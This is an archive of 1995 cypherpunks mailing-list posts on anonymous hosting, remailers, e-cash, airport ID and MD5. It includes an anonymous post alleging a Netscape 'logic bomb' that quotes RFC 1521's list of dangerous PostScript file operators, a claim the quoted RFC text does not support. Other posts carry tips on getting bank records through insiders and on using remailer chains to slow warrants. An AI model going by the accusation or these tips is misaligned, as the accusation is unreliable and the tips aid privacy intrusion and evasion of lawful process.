From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 22 Oct 95 00:45:39 PDT
To: mark@lochard.com.au (Mark)
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <199510220457.AA22856@junkers.lochard.com.au>
Message-ID: <199510220738.AAA08907@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


A) Maintenance requests come in through the remailer network. (Someone
tcp sniffing my incoming network would only see SMTP packets coming
from a remailer.) And the SMTP messages would be encrypted with
alpha.c2.org's key.

B) See (A)

C) We don't keep any information about the owners of anonymous
accounts. We will gladly give up any information we have given a
properly executed court order. The important fact though is that we
don't have the information that an LEA would need to find the person
publishing the materials that the LEA doesn't like.



	The anon shell accounts are more difficult to secure.


> 
> >alpha.c2.org will soon start providing anonymous web page
> >services.  You can get normal webserver access (the alpha.c2.org web
> >pages will be very limited) through an anonymous shell account.
> 
> >> A more cypherpunky type of application would be to enable anonymous
> >> httpd's so that your clients could advertise their nice/naughty products
> >> and be safe from location identification. If they had to pack up then
> >> they could move to another ISP and reconnect to the anon.net as normal.
> >> (Didn't I just read this in a spam HOWTO?)
> 
> >> The problem I see is when a LEA gets involved and snoops your wires and
> >> traces you back to your starting point and then traces the client that is
> >> supplying nasty httpd services. You wouldn't necessarily be aware of this
> >> occurring either.
> 
> How do you propose to protect entities wanting to utilise this function from
> 
> a) people sniffing the tcp packets coming in to discover who is maintaining
>    a web page,
> 
> b) the above LEA attack where your own lines are monitored and data is tracked
>    back thru the various networks to the web page maintainer?
> 
> c) an open LEA confrontation where they issue a warrant demanding any and all
>    info you have on the web page maintainer. (e.g. co$ doesn't like what's on
>    one of the pages)
> 
> The same again for the anon shell accounts.
> 
> Apart from a once off mailed to you via remailer, the creator of a web page
> needs to maintain their creations. This implies a means of accessing it that
> is repeatable. Whether that's via a dialup account or over the net, it can be
> traced. It's only when the entity uses channels outside of the jurisdiction
> or capabilities of those monitoring that some anonymity can be achieved.
> (Implies they weren't monitored entering the blinding channels in the first
> place).
> 
> Cheers,
> Mark
> mark@lochard.com.au
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tsuyoshi Hayashi <hayashi@scs.sony.co.jp>
Date: Sat, 21 Oct 95 13:54:42 PDT
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: crypto export from the UK
In-Reply-To: <Pine.HPP.3.91.951019203347.12052A@cor.sos.sll.se>
Message-ID: <9510211725.AA19668@eagle.scs.sony.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Mats Bergstrom,

On Thu, 19 Oct 1995 20:50:07 +0100 (MET) you said:
 > According to the well researched list of various countries' crypto-laws
 > that Bert-Jaap Koops published on this list last July, the UK does not
 > have any laws against export of crypto. Here are some excerpts.
:
:
 > CRYPTO LAW SURVEY
 > Version July 1995
 > Bert-Jaap Koops (koops@kub.nl)
 > Please credit if quoting.
:
:
 > ----------------------------------------------------------------
 > SURVEY PER COUNTRY
 > 1. Export/ import regulations
 > 2. Other laws/regulations pertaining to encryption
 > 3. Threats/ intentions to regulate encryption
 > 4. Regulations stimulating encryption use
:
:
 > _COCOM_
 > 1. COCOM (Coordinating Committee for Multilateral Export Controls)
 > is an international organization (Japan, Australia, and all NATO

Thanks for your info about _United Kingdom_.  In addition
to it, tell me please about _Japan_ info if you can.

P.S.
Now I am much interested in crypto-related info about the
US and Japan.  A few weeks ago, I read articles on a Japanese
computer-related biz mag.:

 (1) a software company has imported RSA's BSAFE toolkit,
 (2) the US gov. has eased ITAR reg. off last month.

If you have more info or more exact info, please tell me.
> all

Thanx.

# Note that I will take a week's holiday.  So I will not be
# able to reply to your mail even if you send me one.  But I
# will reply when I return to work.

- Tsuyoshi Hayashi <hayashi@scs.sony.co.jp>
-- Tech. div., Sony Computer Systems Inc.
--- # private: take@imasy.or.jp (read not frequently)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sun, 22 Oct 95 01:46:23 PDT
To: cypherpunks@toad.com
Subject: Re: Reducing the Flames, Attacks, and Nit-Pickings
Message-ID: <199510220147.BAA17394@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


It's good to see a real Californian fighting forest fires!

Love Always,

Carol Anne

>My comments will likely vanish without a trace, but I urge folks to hold
>back a bit on jumping in with attacks and reports of problems. Be sure
>something is _really_ a flaw before sounding the alarms.
>--Tim May
>Views here are not the views of my Internet Service Provider or Government.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>Corralitos, CA              | knowledge, reputations, information markets,
>Higher Power: 2^756839      | black markets, collapse of governments.
>"National borders are just speed bumps on the information superhighway."
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 22 Oct 95 06:10:54 PDT
To: cypherpunks@toad.com
Subject: S.F. judge to rule on encoding software
Message-ID: <308A41DC.603E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.sfgate.com/net/abate/1021.html

  FYI.  The above URL points to a SF Examiner article about the
Bernstein case, including Friday's proceedings.

        --Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Sun, 22 Oct 95 09:50:44 PDT
To: cypherpunks@toad.com
Subject: BlackNet in "Hardware"
Message-ID: <199510221650.JAA07758@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain


I just bought "Hardware" (Delacorte Press, 1995) by Linda Barnes, one of
my favorite mystery authors, and experienced a startled frisson when I saw
that at least a couple of subscribers had their work immortalized:
Tim's "Invitation to BlackNet" is the opening quote, and the date given is
for L.'s widespread Usenet spam of Feb '94.

No book report here, but it was as gripping as the rest of her efforts.
It's "about" people rather than computer hackery, but the computery bits
were done quite well.  Does an Amiga 2000 <really> have PC and Mac
compatibility options?  I don't know, and it doesn't matter anyway.

	Jim Gillogly
	1 Blotmath S.R. 1995, 16:48




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sun, 22 Oct 95 09:55:24 PDT
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <acb027040402100417fa@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

If you simply do not want to be a final hop, it is trivial to distinguish
final hops from intermediate hops in the chain. With cypherpunk remailers
you can scan for the remailer headers. With Mixmaster there is a completely
different format to the encrypted header (inside the encryption) for final
hops as opposed to intermediate hops.

I think one solution to this problem is to encourage (require) the use of
pseudonym servers. Having a server like alpha as the entity on the from
line has several advantages.

1) Less Spam since it takes some effort to set up the nym and it will be taken
away as soon as the spam starts.

2) The operator can take firm action. When people complain they want you to
punish the abuser. Typically they want you to pull the offender's account.
With a remailer there is no account to pull, but with a nym server it is
easy to kill the account, making the complainer happy.

3) The nym server could have a policy of only accepting messages encrypted
to it, and logging the address the message came from. If confronted, the
nym server could point to the last remailer in the chain. But that remailer
could not have known the contents of the message since it was encrypted to
the nym server.

If all nym servers were standardized to run from the same account name
(nymserve for example) the remailers could be configured to only deliver
final hops to addresses with that username.

        -Lance

>At 12:59 PM 10/19/95 -0400, Thomas Grant Edwards wrote:
>>This would require the remailer to examine entropy of messages passing
>>through.  Anything not random enough gets tossed.
>
>
>A simple entropy measuring algorithm:
>
<SNIP>
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 22 Oct 95 10:16:44 PDT
To: cypherpunks@toad.com
Subject: Re: BlackNet in "Hardware"
Message-ID: <acafc92754021004cca0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:50 PM 10/22/95, Jim Gillogly wrote:
>I just bought "Hardware" (Delacorte Press, 1995) by Linda Barnes, one of
>my favorite mystery authors, and experienced a startled frisson when I saw
>that at least a couple of subscribers had their work immortalized:
>Tim's "Invitation to BlackNet" is the opening quote, and the date given is
>for L.'s widespread Usenet spam of Feb '94.

Interesting. I'll pick up a copy today.

>No book report here, but it was as gripping as the rest of her efforts.
>It's "about" people rather than computer hackery, but the computery bits
>were done quite well.  Does an Amiga 2000 <really> have PC and Mac
>compatibility options?  I don't know, and it doesn't matter anyway.

I recollect that the Amiga had some gizmo--I think it was called
"MagicSack" or something like that--that let it run Macintosh programs,
sort of. It never really caught on, at least as an alternative to real
Macs. And I think something similar was available for DOS. This was all
several years back, before the Amiga faded out.

Amiga users and former Amiga users can probably tell us more.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 22 Oct 95 10:36:25 PDT
To: cypherpunks@toad.com
Subject: Mondex vs. Digicash (was: Godzilla vs. Mothra)
Message-ID: <v02120d02acb032401526@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I disagree with Michael's assertion that Mondex will necessarily
win over Digicash. Here's why:

o The availability of Digicash in the US, for real, with spender
  anonymity, will be announced very soon; reporter activity on
  this subject is consistent with an embargoed press release for
  Monday or Tuesday. From posts to the list it's clear that a fully
  working system, ready for customers, will be announced.

o When doing market research on this subject, it became clear that
  low-value payments are largely going to be used for impulse
  purchases. If the Digicash system allows people to set up their
  accounts without getting out of their chairs (which I suspect will
  be the case, if they do it right), it will initially get more
  adopters.

o One or both systems could be found to have serious security problems;
  who knows what the outcome of their discovery & exploitation would be?
  I know at least one group of people who believe they have a good line
  on a serious security problem in Mondex.

o Even if the Mondex hardware were given away for free, think how
  much fun it is for the average user to add a new piece of hardware
  to their machines... ever install a sound card and CD-ROM drive on
  a PC? I remember reading something like 20% of all "multimedia"
  kits were returned, largely due to user install problems. If there
  is a competing method that costs the same and _doesn't_ require
  the hardware, people will tend to go with this.

o In my conversations with state and federal regulators, it is clear
  that it _is_ possible to issue spender-anonymous e-cash. If you ask
  them, "Hey, can I create fully anonymous digital cash?", they go
  apeshit, but if you explain that the money uses existing (auditable)
  channels going in, and existing (auditable) channels going out, and
  that only spenders are anonymous, they relax considerably. They may
  change their minds later, but we're about to get an existence proof.

o It's not clear that _either_ system is going to win completely in
  the next 10+ years. Although there's been considerable shakeout in
  the last ten years, there is still a huge variety of non-electronic
  payment methods -- how can you be so sure that Mondex will win over
  Digicash, and that they won't co-exist like, say, money orders,
  currency and cashier's checks (three instruments with both similar
  and dissimilar attributes)?

Douglas Barnes
Electric Communities






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MDresser@aol.com
Date: Sun, 22 Oct 95 07:47:39 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
Message-ID: <951022104651_50987142@emout05.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510120347.UAA27336@infinity.c2.org>, sameer wrote:
> 
>  I completely agree that the reporters on this list make things
> very difficult and people do need to be very careful about posting
> things which will get misinterpreted by reporters.. etc.<


FYI, the day after the Markoff piece ran in the NYT, The Baltimore Sun ran an
article debunking it, based on independent reporting. Generalizing about
reporters is about as intellectually valid as generalizing about hackers.
Michael Dresser, who wrote it
(speaking for myself, not my employer)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 22 Oct 95 10:37:39 PDT
To: cypherpunks@toad.com
Subject: Remailer-in-a-Box, Everyone a Remailer
Message-ID: <acafcb2f5502100446ba@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:02 PM 10/22/95, Lance Cottrell wrote:

>I think one solution to this problem is to encourage (require) the use of
>pseudonym servers. Having a server like alpha as the entity on the from
>line has several advantages.
>
>1) Less Spam since it takes some effort to set up the nym and it will be taken
>away as soon as the spam starts.
>
>2) The operator can take firm action. When people complain they want you to
>punish the abuser. Typically they want you to pull the offender's account.
>With a remailer there is no account to pull, but with a nym server it is
>easy to kill the account, making the complainer happy.

I fully agree with this point, and have argued for this approach before.

There is no logical or other reason why "physical machine site = a
remailer," even though that has until recently been the norm. ("I have a
machine--I'll run a remailer.")

Rather, a single physical machine site can and should be able to run many
remailers, out of user accounts. (Accounts on systems like Sameer's C2. Or
Hal's remailer running on Portal. Or maybe some of the Mixmaster clients.)

This has a couple of salutary effects:

1. It separates the logical function, and responsibilities, of running a
remailer from the function of maintaining a site.

2. It puts the "risk" on the account holder, not the site owner. (The site
owner can plausibly deny knowing the account was remailing messages.)

3. A proliferation of nyms can be used, as Lance notes, with the "offending
nym" cancelled when trouble arises. (I'm not especially keen on seeing
sysops bow to pressure to kill accounts, but if it happens, better it
happens to a "disposable nym.")

4. Multiplication. Having remailer accounts instead of remailer sites means
an N-fold increase in the number of remailers.

5. A single person could have multiple remailer nym accounts, perhaps
having differing policies.

6. Search warrants and legal speed bumps. If the cops have to get separate
search warrants for N accounts, on M different sites, this will slow things
down. (Hint: The remailer "Ralph" can choose to route messages through N
extra steps, perhaps on several of his own accounts on _distant_ machines.
Faced with a search warrant on "his" account, a la the visits to Penet, he
doesn't have to implicate himself by saying he also owns the N other hops.
Of course, he can do the same thing with remailers operated by
others....I'm just noting that having N remailers under one's own control
has certain elegant advantages.)



>3) The nym server could have a policy of only accepting messages encrypted
>to it, and logging the address the message came from. If confronted, the
>nym server could point to the last remailer in the chain. But that remailer
>could not have known the contents of the message since it was encrypted to
>the nym server.

7. Competition. Picking up on Lance's point, having multiple remailer
accounts under one's own control allows one to experiment with various
policies and operational modes, and to see which are most popular. Great
for evolutionary purposes.

8. Finally, and most importantly, the "remailer in a box" idea, for
turn-key remailers, allows even the timid to operate a remailer FOR THEIR
OWN USE! That is, they don't have to publicize the public key, or the
existence at all of the remailer. But they can use it in their own chain of
hops, for their own messages or for whatever. This facilitates the
"everyone a remailer" idea. It also increases protection ("always include a
remailer under your own control").

I'll stop for now.

--Tim May



Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Sun, 22 Oct 95 08:17:48 PDT
To: cypherpunks@toad.com
Subject: Lack of secrecy in U.S. Banks
Message-ID: <wkoDDD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

ph@netcom.com (Peter Hendrickson) writes:

> 
> I ran across an interesting fragment of the U.S. Code.
> 
> Apparently, the Federal Government may access any banking records

As a former bank employee, I can assure all readers that privacy of banking
records is nonexistent. All you need is a friend who works in the computer,
auditing, bookkeeping, or loan department (in that order of preference). If
your friend has worked there long enough, he/she can probably also get
information from any other bank in the community. (Don't suggest the
security department. As far as bank transactions are involved, the Auditor
normally handles that.)

To reassure the excessively paranoid, bank employees are normally flooded
with so much information per day that they normally take no interest in any
more of it than their job forces them to. Moreover, when you consider that it
is commonplace for a teller to handle total transactions daily that run well
into six figures, few if any individual transactions attract any attention.

Banking trivia #1: Banks are the only businesses that close their books daily
rather than monthly or quarterly.

Banking trivia #2: When choosing a bank, check out the Cash Over/Cash Under
account on their balance sheets.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                             jgrubs@webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Tue, 24 Oct 95 09:38:49 PDT
To: cypherpunks@toad.com
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
Message-ID: <199510241633.LAA25052@zoom.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:42 AM 10/24/95 -0400, Dr. Frederick B. Cohen wrote:
>>  > [...] uses an MD5 checksum which the members
>>  > of this list seem to place unlimited trust in (incorrectly in my view,
>>  > but that would be picking two nits with one keyboard entry).
>> 
>> Can you elaborate with facts on the supposed weakness of MD5 ?
>
>I didn't say that there were any weaknesses in MD5, all I said was:
>	"unlimited trust ... (incorrectly in my view...)"
>
...
>> [btw who talked about 'unlimited' trust ?]
>
>There has been no limit given by anyone on this list to the level of
>trust they place in MD5.  Several people have posted (without
>contention) that MD5 is sufficiently trustworthy to trust billions of
>dollars in commerce to its being able to prevent a selected plaintext
>attack as alluded to above.  If you think we should trust it, and you
>don't limit your assessment of trust, what other assumption should I
>make? If several people proclaim that trust and nobody stands up in
>disagreement, tacit agreement is my normal (although not necessarily
>justified) assumption. 
>

The dear "Dr." Cohen strikes again:

  It would appear that "Dr." Cohen continues to assume that this list
appeared the moment he first posted, or that we love to type the same
symbols over and over.  This list places no more trust in MD5 than in
IDEA--or RSA, for that matter.  But since banks CURRENTLY trust RSA for
billions of dollars in transactions (and, I believe with fairly small
moduli) this trust is the usual trust of experience.

  In fact there HAVE been discussions of the security of MD5 on this
list--but since they occurred before the good "Dr." Cohen arrived, perhaps we
should have them again for his sake.  But since most of us tire of typing
(and reading) endless explanations that we DON'T trust something
absolutely, we don't.  We also don't spend all of our time correcting
slightly overgeneralized statements. And of course there is the small fact
that quite a few people here believe that if anyone is foolish enough to
place absolute trust in an algorithm, who are we to disabuse them?

  But if "Dr." Cohen wishes to discuss the weaknesses of MD5, he should
focus his attention on his preferred whipping dog--PGP.  Some versions of PGP
had an insecure implementation of MD5.  But of course the "Dr." should know
that an insecure implementation is very far from a demonstration that an
algorithm is insecure.


Nathan Zook
---
Now installing Linux 3.0 or something...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Sat, 21 Oct 95 19:33:33 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <199510220102.SAA12922@jobe.shell.portal.com>
Message-ID: <199510220058.AA44534@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>I was toying with a limited form of this idea earlier, where outgoing
>connections would be limited to http servers.  These are usually on a
>small number of ports, although there are exceptions.  At least it
>would be possible to filter out telnet and rlogin and such for that
>application.  I don't think there are too many bad things you can do
>just by connecting to httpd ports (probably I would be surprised,
>though...).  But doing that would not make as much sense for the ETT
>application.

A more cypherpunky type of application would be to enable anonymous
httpd's so that your clients could advertise their nice/naughty products
and be safe from location identification. If they had to pack up then
they could move to another ISP and reconnect to the anon.net as normal.
(Didn't I just read this in a spam HOWTO?)

The problem I see is when a LEA gets involved and snoops your wires and
traces you back to your starting point and then traces the client that is
supplying nasty httpd services. You wouldn't necessarily be aware of this
occurring either.

Mark



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 22 Oct 95 05:17:18 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: airport security
In-Reply-To: <acaf1d35530210046717@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.951022120147.4986A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   I tried to board my 15 year old son on Delta's Sky West in St George 
UT for SLC last week --they _required_ ID, and it took me almost 5 
minutes to back a very polite counter agent down from the requirement. 
   Now, maybe I am an obstructionist, but I have been foregoing the 
IRS deductions for my 5 children since I refuse to obtain SSNs for them. 
Again, that made life interesting at passport time --I entered 
000-00-0000 for the kids and passports were issued.  
   Likewise, I have had more than one hospital _try_ to refuse service for
lack of SSN. 
   At close to 300 lbs and dressed in black and concave inverter reflector
lenses, it becomes an excellent example of "...intimidation is just
another form of communication...." 
   Whether we like it or not, "they" intend to tag us --there was a very
informative article on non-intrusive scanning of the iris for
identification within the last month -not sure which rag. From "their" 
perspective, scanning the iris is far more secure than the imbedded 
chip.  Maybe we can scuttle it on discrimination against the visually 
impaired! :)
   This topic may be relevant since crypto -probably "their" private
crypto after banning ours- will be essential to establish communications
to the central data bank somewhere under the NSA monolith or wherever... 
On the other, the list topics are too fragmented and I agree with tcm, 
futplex, etc. that we need more concentration on crypto "methods" -rather 
than speculation on what method the Feds are going to try to screw us 
over with next.

On Sat, 21 Oct 1995, Timothy C. May wrote:

> At 2:05 AM 10/22/95, Alan Horowitz wrote:
> >Why should airplane crashes be more of a cause for disseminating the
> >Surveillance State than Greyhound Bus crashes?
> >
> >I'd be more sympathetic to arguments about an airline's right to write
> >its contracts as it pleases. Though they are Common Carriers; they can't
> >just offer Contracts of Adhesion at will.
> 
> No crypto relevance--my apologies.
> 
> I am skeptical that the "all passengers must have picture IDs" has much to
> do with identifying corpses after crashes.
> 
> The recent push is certainly associated with the various terrorist threats
> and incidents. The FAA can push for it, and the airlines have little to say
> about it.
> 
> However, I read--probably in the WSJ--that the airlines see this as a
> chance to regain control of "ticket abuse." Corporations often have bought
> up discount tickets without knowing who will be travelling and on what
> dates. This allows them to have a pool of tickets and saves them a bunch of
> money.
> 
> Reports are that many people showed up at boarding gates with a different
> name than what the ticket said, and had to pay extra to get a current
> ticket (no advance purchase, of course).
> 
> I'm not sure what the compelling lessons are, except that the
> "Identification Required State" is getting closer every day.
> 
> --Tim May
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 22 Oct 95 10:03:45 PDT
To: Wei Dai <weidai@eskimo.com>
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <Pine.SUN.3.91.951021145844.29391F-100000@eskimo.com>
Message-ID: <199510221703.NAA02029@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Wei Dai writes:
> I am writing a program called Encrypted TCP Tunneler, which I hope to
> finish in a month or so.

I never finished my own implementation of IPSEC because I didn't have
time, but I am now in possession of a fully functioning version for
4.4BSD derived systems that was developed at NRL. I'm going to have it
integrated into the NetBSD source tree very soon.

I really encourage Wei and anyone else who's interested in this sort
of stuff to participate in the IPSEC work so that we can try to put
all our effort behind the one standardized solution -- it will make
interoperability much easier at the very least!

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Sun, 22 Oct 95 11:19:19 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <Pine.OSF.3.91.951022131818.9371D-100000@Joyce-Perkins.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Another aspect of the requirement for the name on a ticket is to 
discourage the development of a secondary, uncontrolled market in tickets.

Dan







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 22 Oct 95 14:10:05 PDT
To: cypherpunks@toad.com
Subject: Netscape Logic Bomb detailed by IETF
Message-ID: <199510222108.OAA05412@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


With all of the Noise on this list, and all of the opinion that has been
expressed, opinion which would seek to slander, misrepresent or opinion
which would like to represent itself as fact, it has increasingly become
difficult to separate the wheat from the chaff. 

Clearly, someone has a vested interest which they are expending a 
great deal of effort to protect.  My email to Netscape detailing their 
logic bomb has gone unanswered, and unacknowledged for ten days now.

Ten days is a long time for no "official" comment.  Just as ten days is a
long time not to answer email.

Rather than attacking individual posters, rather than questioning
credentials, rather than scaring journalists, rather than intimidating and
wilfully spreading misinformation to create confusion, rather than doing
any of this, I will simply quote the official minutes of the Internet
Engineering Task Force (IETF) which is the protocol engineering,
development and standardization arm of the Internet Architecture Board
(IAB).

The IETF is a large open international community of network designers,
operators, vendors, and researchers concerned with the evolution of the
Internet protocol architecture and the smooth operation of the Internet. 

Request-For-Comments are a series of memorandums which act as official 
minutes of the IETF.  Request-For-Comments No. 1521 (RFC-1521) Subsection 
7.4.2 is authoritative and has been reviewed and has received 
international approval.

To avoid the accusation of misquoting, I will simply quote Section 7.4.2
of RFC1521 in its entirety. 

This memorandum has unlimited distribution and is available by FTP from
DS.INTERNIC.NET, NIS.NSF.NET, NISC.JVNC.NET, FTP.ISI.EDU,
WUARCHIVE.WUSTL.EDU, FTP.CONCERT.NET, or FTP.SESQUI.NET. European readers
might be advised to use the United Kingdom repository at SRC.DOC.IC.AC.UK. 
Asian & Pacific Users should probably use the local mirror for
WUARCHIVE.WUSTL.EDU, or alternatively, their local National RFC
repository. 

>7.4.2.     The Application/PostScript subtype
>
>   A Content-Type of "application/postscript" indicates a PostScript
>   program.  Currently two variants of the PostScript language are
>   allowed; the original level 1 variant is described in [POSTSCRIPT]
>   and the more recent level 2 variant is described in [POSTSCRIPT2].
>
>   PostScript is a registered trademark of Adobe Systems, Inc.  Use of
>   the MIME content-type "application/postscript" implies recognition of
>   that trademark and all the rights it entails.
>
>   The PostScript language definition provides facilities for internal
>   labeling of the specific language features a given program uses. This
>   labeling, called the PostScript document structuring conventions, is
>   very general and provides substantially more information than just
>   the language level.
>
>   The use of document structuring conventions, while not required, is
>   strongly recommended as an aid to interoperability.  Documents which
>   lack proper structuring conventions cannot be tested to see whether
>   or not they will work in a given environment.  As such, some systems
>   may assume the worst and refuse to process unstructured documents.
>
>   The execution of general-purpose PostScript interpreters entails
>   serious security risks, and implementors are discouraged from simply
>   sending PostScript email bodies to "off-the-shelf" interpreters.
>   While it is usually safe to send PostScript to a printer, where the
>   potential for harm is greatly constrained, implementors should
>   consider all of the following before they add interactive display of
>   PostScript bodies to their mail readers.
>
>   The remainder of this section outlines some, though probably not all,
>   of the possible problems with sending PostScript through the mail.
>
>   Dangerous operations in the PostScript language include, but may not
>   be limited to, the PostScript operators deletefile, renamefile,
>   filenameforall, and file.  File is only dangerous when applied to
>   something other than standard input or output. Implementations may
>   also define additional nonstandard file operators; these may also
>   pose a threat to security.  Filenameforall, the wildcard file search
>   operator, may appear at first glance to be harmless. Note, however,
>   that this operator has the potential to reveal information about what
>   files the recipient has access to, and this information may itself be
>   sensitive.  Message senders should avoid the use of potentially
>   dangerous file operators, since these operators are quite likely to
>   be unavailable in secure PostScript implementations.  Message-
>   receiving and -displaying software should either completely disable
>   all potentially dangerous file operators or take special care not to
>   delegate any special authority to their operation. These operators
>   should be viewed as being done by an outside agency when interpreting
>   PostScript documents.  Such disabling and/or checking should be done
>   completely outside of the reach of the PostScript language itself;
>   care should be taken to insure that no method exists for re-enabling
>   full-function versions of these operators.
>
>   The PostScript language provides facilities for exiting the normal
>   interpreter, or server, loop. Changes made in this "outer"
>   environment are customarily retained across documents, and may in
>   some cases be retained semipermanently in nonvolatile memory. The
>   operators associated with exiting the interpreter loop have the
>   potential to interfere with subsequent document processing. As such,
>   their unrestrained use constitutes a threat of service denial.
>   PostScript operators that exit the interpreter loop include, but may
>   not be limited to, the exitserver and startjob operators.  Message-
>   sending software should not generate PostScript that depends on
>   exiting the interpreter loop to operate. The ability to exit will
>   probably be unavailable in secure PostScript implementations.
>   Message-receiving and -displaying software should, if possible,
>   disable the ability to make retained changes to the PostScript
>   environment, and eliminate the startjob and exitserver commands.  If
>   these commands cannot be eliminated, the password associated with
>   them should at least be set to a hard-to-guess value.
>
>   PostScript provides operators for setting system-wide and device-
>   specific parameters. These parameter settings may be retained across
>   jobs and may potentially pose a threat to the correct operation of
>   the interpreter.  The PostScript operators that set system and device
>   parameters include, but may not be limited to, the setsystemparams
>   and setdevparams operators.  Message-sending software should not
>   generate PostScript that depends on the setting of system or device
>   parameters to operate correctly. The ability to set these parameters
>   will probably be unavailable in secure PostScript implementations.
>   Message-receiving and -displaying software should, if possible,
>   disable the ability to change system and device parameters.  If these
>   operators cannot be disabled, the password associated with them
